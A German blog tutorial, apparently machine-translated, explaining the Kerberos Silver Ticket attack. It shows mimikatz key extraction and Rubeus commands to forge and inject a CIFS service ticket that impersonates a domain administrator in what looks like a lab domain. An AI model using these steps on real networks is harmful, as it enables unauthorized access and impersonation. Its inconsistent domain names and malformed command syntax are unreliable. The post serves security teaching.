Tickets Kerberos - Silberticket

3. Juni 2024 Celia Catalán

Um mit den Lieferungen von Kerberos-Tickets fortzufahren, haben wir in früheren Veröffentlichungen über das Golden Ticket gesprochen, dieses Mal werden wir über das Silver Ticket sprechen.

SILBERTICKET

Beim Silver-Ticket-Angriff wird ein Ticket Granting Service (TGS) erstellt, der es Angreifern ermöglicht, auf einen bestimmten Dienst in einer Active Directory-Umgebung zuzugreifen, ohne sich über den Domänencontroller (Key Distribution Center, KDC) authentifizieren zu müssen.

Diese Methode basiert auf dem Erfassen des NTLM-Hashs oder Passworts eines Dienstkontos, um einen Ticket Granting Service (TGS) zu fälschen. Diese Anmeldeinformationen können während des Domänenangriffs auf unterschiedliche Weise erhalten werden, beispielsweise durch Tools wie Responder oder durch Kerberoasting-Techniken. Nach der Erstellung dieses gefälschten Tickets kann ein Angreifer auf den jeweiligen Dienst zugreifen und sich als beliebiger Benutzer ausgeben, normalerweise mit dem Ziel, Administratorrechte zu erlangen.

Wenn die AES-Schlüssel statt im Klartext oder NTLM-Hash erhalten werden könnten (z. B. durch einen Speicherauszug), wird empfohlen, diese AES-Schlüssel für die Erstellung der Tickets zu verwenden, da dies sicherer und sicherer ist weniger erkennbare Weise.

Exploration:

Nehmen wir zunächst an, dass wir eine Sitzung als SYSTEM auf einem Computer in der Domäne erhalten haben. Dies könnte beispielsweise nach der Kompromittierung eines IIS-Servers und der anschließenden Eskalation der Berechtigungen mithilfe eines Potato-Exploits geschehen sein.

Nachdem wir die Kontrolle über den Server erlangt haben, können wir die Kerberos-Schlüssel mit mimikatz und dem Befehl sekurlsa::ekeys erhalten

Ticketerstellung

Sobald wir die Kerberos-Schlüssel erhalten haben, können wir ein Ticket für den CIFS-Dienst des Servers selbst erstellen, der uns als Benutzer der gewünschten Domäne den Zugriff darauf garantiert. In diesem Fall erstellen wir das Ticket mit dem Befehl:

Rubeus.exe silver /service:cifs/castelblack.north.servingkingdom.local/aes256:0ad6c98bbba174b0b2f8d9a05279fe6892cef5f0e1bab59e01b5510e9920774d/user: eddard.stark/domain:north.servingkingdom /sid: S-1-5- 21-1430251130-2586379517-4083755373 /nowrap

Dienst: Name des Dienstes, für den das Ticket angefordert wird

Aes256: Aes256-Schlüssel des zuvor extrahierten Maschinenkontos

Benutzer: Benutzer, der unpersönlich gemacht werden soll, in diesem Fall ein Domänenadministrator

Domäne: Domänenname

Sid: SID der Domäne

Importieren Sie das Ticket

Sobald das Ticket erhalten ist, können wir überprüfen, dass wir über unsere nicht privilegierte Benutzerkonsole keinen Administratorzugriff auf den Server haben.

ls \\castelblack.north.sevenkingdoms.local\C$

Im nächsten Schritt wird das zuvor generierte Ticket in einen neuen Prozess importiert. Dies kann mit dem Befehl erreicht werden:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:NORTH /username: eddard.stark /password:PassFake /ticket: doIGGDCC[…]b2NhbA==

Programm: Befehl zur Ausführung dort, wo das Ticket eingefügt wird

Domäne: Domänenname

Benutzername: Domänenbenutzer

Passwort: Benutzerpasswort. Es ist nicht erforderlich, das echte Passwort des Benutzers zu kennen.

Ticket: Das zuvor erstellte Ticket

Nachdem wir den Prozess mit unserem Silver Ticket erstellt haben, können wir nun aus unserer nichtprivilegierten Benutzersitzung über den CIFS-Dienst auf den betreffenden Server zugreifen.

ls \\castelblack.north.sevenkingdoms.local\c$

Einschränkungen:

Ein Silberticket ist nur für den spezifischen Service gültig, für den es erstellt wurde. Der Zugriff auf andere Dienste oder Ressourcen ist nicht möglich.

Und damit beenden wir den Beitrag, insofern wissen wir jetzt über das Silver Ticket und das Golden Ticket Bescheid, eine weitere Folge über diese Kerberos-Tickets steht noch aus. Bis zum nächsten Ticket.

Álvaro Temes , Cybersicherheitsanalyst bei Zerolynx .

Zurück zum Blog